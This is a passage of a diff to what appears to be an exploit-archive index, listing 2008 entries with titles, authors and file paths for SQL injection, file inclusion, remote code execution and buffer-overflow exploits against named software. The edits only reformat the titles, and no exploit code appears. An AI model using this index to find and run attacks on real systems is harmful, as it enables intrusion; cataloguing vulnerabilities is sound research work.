Buffer Overflow Exploit",2008-07-06,krafty,osx,remote,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 -6016,platforms/php/webapps/6016.pl,"fuzzylime CMS 3.01a - (file) Local File Inclusion Exploit",2008-07-07,Cod3rZ,php,webapps,0 -6017,platforms/php/webapps/6017.pl,"Triton CMS Pro - (X-Forwarded-For) Blind SQL Injection",2008-07-07,girex,php,webapps,0 -6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition - Remote Code Execution Exploit",2008-07-07,Ams,php,webapps,0 +6016,platforms/php/webapps/6016.pl,"Fuzzylime CMS 3.01a - (file) Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 +6017,platforms/php/webapps/6017.pl,"Triton CMS Pro - (x-forwarded-for) Blind SQL Injection",2008-07-07,girex,php,webapps,0 +6018,platforms/php/webapps/6018.pl,"Neutrino 0.8.4 Atomic Edition - Remote Code Execution",2008-07-07,Ams,php,webapps,0 6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (2)",2008-07-07,ka0x,php,webapps,0 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script 1.1 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin Exploit",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 -6025,platforms/php/webapps/6025.txt,"Joomla Component com_content 1.0.0 - (ItemID) SQL Injection",2008-07-08,unknown_styler,php,webapps,0 -6026,platforms/linux/remote/6026.pl,"trixbox - (langChoice) Local File Inclusion Exploit (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 +6025,platforms/php/webapps/6025.txt,"Joomla Component com_content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 +6026,platforms/linux/remote/6026.pl,"trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - (sIncPath) Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 -6029,platforms/multiple/dos/6029.txt,"Firefox/Evince/EOG/Gimp - (.SVG) Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",multiple,dos,0 +6029,platforms/multiple/dos/6029.txt,"Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",multiple,dos,0 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow Exploit",2008-07-08,h07,windows,local,0 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0 -6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0 +6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0 6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 -6034,platforms/php/webapps/6034.txt,"Dreampics Builder - (page) SQL Injection",2008-07-09,"Hussin X",php,webapps,0 +6034,platforms/php/webapps/6034.txt,"DreamPics Builder - (page) SQL Injection",2008-07-09,"Hussin X",php,webapps,0 6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0 6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 -6037,platforms/php/webapps/6037.txt,"PHPDatingClub - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 +6037,platforms/php/webapps/6037.txt,"phpDatingClub - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow",2008-07-11,Shinnok,windows,local,0 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0 -6043,platforms/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",osx,dos,0 +6043,platforms/osx/dos/6043.rb,"Core Image Fun House 2.0 (OS X) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",osx,dos,0 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service (PoC)",2008-07-12,"Mu Security",multiple,dos,0 @@ -5668,15 +5669,15 @@ id,file,description,date,author,platform,type,port 6049,platforms/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6050,platforms/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 -6053,platforms/php/webapps/6053.php,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (PHP)",2008-07-12,"Inphex and real",php,webapps,0 -6054,platforms/php/webapps/6054.pl,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (Perl)",2008-07-12,"Inphex and real",php,webapps,0 +6053,platforms/php/webapps/6053.php,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (PHP)",2008-07-12,"Inphex and real",php,webapps,0 +6054,platforms/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution (Perl)",2008-07-12,"Inphex and real",php,webapps,0 6055,platforms/php/webapps/6055.pl,"Joomla Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",php,webapps,0 6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 6058,platforms/php/webapps/6058.txt,"Avlc Forum - 'vlc_forum.php id' SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 6059,platforms/windows/dos/6059.pl,"Simple DNS Plus 5.0/4.1 - Remote Denial of Service",2008-07-13,Exodus,windows,dos,0 -6060,platforms/php/webapps/6060.php,"fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 -6061,platforms/php/webapps/6061.txt,"Maian GuestBook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6060,platforms/php/webapps/6060.php,"Fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution",2008-07-13,"Charles Fol",php,webapps,0 +6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 - Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 @@ -5685,7 +5686,7 @@ id,file,description,date,author,platform,type,port 6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection",2008-07-13,DNX,php,webapps,0 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a - Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 -6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 +6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - 'cookie' Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 6071,platforms/php/webapps/6071.txt,"CodeDB - 'list.php lang' Local File Inclusion",2008-07-14,cOndemned,php,webapps,0 6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",windows,dos,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 @@ -5700,27 +5701,27 @@ id,file,description,date,author,platform,type,port 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow (PoC)",2008-07-15,r0ut3r,windows,dos,0 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injections",2008-07-15,Mr.SQL,php,webapps,0 -6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution Exploit",2008-07-16,Inphex,php,webapps,0 +6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution",2008-07-16,Inphex,php,webapps,0 6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register - SQL Injection",2008-07-16,His0k4,php,webapps,0 -6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro - (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0 +6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,php,webapps,0 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 -6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Remote SELinux Privilege Elevation Exploit (Post-Authenticated)",2008-07-17,eliteboy,linux,remote,0 -6095,platforms/php/webapps/6095.pl,"AlstraSoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 +6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 +6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Post-Authentication) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 +6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows/x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80 -6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Pre-Authenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 +6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0 -6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution Exploit (Perl) (2)",2008-07-21,"Guido Landi",windows,local,0 +6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (Perl) (2)",2008-07-21,"Guido Landi",windows,local,0 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) Local File Inclusion",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0 @@ -5732,16 +5733,16 @@ id,file,description,date,author,platform,type,port 6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (Perl)",2008-07-22,"Guido Landi",windows,remote,0 6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 -6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 +6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'default.asp catid' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access - (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 -6125,platforms/php/webapps/6125.txt,"Atom PhotoBlog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 +6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 6126,platforms/php/webapps/6126.txt,"ibase 2.03 - 'download.php' Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 -6127,platforms/php/webapps/6127.htm,"Wordpress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 +6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps,0 6129,platforms/minix/dos/6129.txt,"minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 @@ -5762,21 +5763,21 @@ id,file,description,date,author,platform,type,port 6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0 -6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - (language) Local File Inclusion",2008-07-28,NoGe,php,webapps,0 +6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 -6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download",2008-07-28,DSecRG,windows,remote,0 +6151,platforms/windows/remote/6151.txt,"velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit",2008-07-28,Elazar,windows,remote,0 6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 -6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - (lang) Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 +6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection",2008-07-29,"Virangar Security",php,webapps,0 6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - rsargs[] SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 -6162,platforms/php/webapps/6162.txt,"hiox browser statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 +6162,platforms/php/webapps/6162.txt,"hiox browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 6165,platforms/php/webapps/6165.txt,"ZeeReviews - 'comments.php ItemID' SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 @@ -5786,23 +5787,23 @@ id,file,description,date,author,platform,type,port 6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 - (Calendar Module) SQL Injection",2008-07-30,Jack,php,webapps,0 -6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution Exploit",2008-07-30,"GulfTech Security",php,webapps,0 +6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 -6174,platforms/multiple/dos/6174.txt,"F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 +6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 6175,platforms/windows/remote/6175.html,"NCTsoft - AudFile.dll ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0 -6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution Exploit",2008-07-31,Raz0r,php,webapps,0 -6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution Exploit",2008-07-31,EgiX,php,webapps,0 -6179,platforms/php/webapps/6179.txt,"LetterIt 2 - (language) Local File Inclusion",2008-07-31,NoGe,php,webapps,0 +6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0 +6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0 +6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Local File Inclusion",2008-07-31,NoGe,php,webapps,0 6180,platforms/php/webapps/6180.txt,"phpMyRealty - (location) SQL Injection",2008-08-01,CraCkEr,php,webapps,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0 -6182,platforms/php/webapps/6182.txt,"PHPAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 +6182,platforms/php/webapps/6182.txt,"phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a - (abg_path) Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0 6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - (mail_id) SQL Injection",2008-08-01,Corwin,php,webapps,0 6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6188,platforms/windows/local/6188.c,"IrfanView 3.99 - IFF File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 +6188,platforms/windows/local/6188.c,"Irfanview 3.99 - IFF File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0 6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 @@ -5820,7 +5821,7 @@ id,file,description,date,author,platform,type,port 6206,platforms/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' SQL Injection",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (Local File Inclusion) Code Execution",2008-08-06,otmorozok428,php,webapps,0 -6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 +6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 @@ -5836,11 +5837,11 @@ id,file,description,date,author,platform,type,port 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final - (startup.php) Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0 6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 - Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps,0 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injections",2008-08-10,"Virangar Security",php,webapps,0 -6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 +6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0 6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)",2008-08-11,"Simon Ryeo",multiple,remote,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0 -6231,platforms/php/webapps/6231.txt,"Ppim 1.0 - (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 +6231,platforms/php/webapps/6231.txt,"Ppim 1.0 - (upload/change Password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - (mod) SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 @@ -5853,10 +5854,10 @@ id,file,description,date,author,platform,type,port 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio - (Msmask32.ocx) ActiveX Remote Buffer Overflow (PoC)",2008-08-14,Symantec,windows,dos,0 6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Multiple Local File Inclusion",2008-08-15,Don,php,webapps,0 6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK 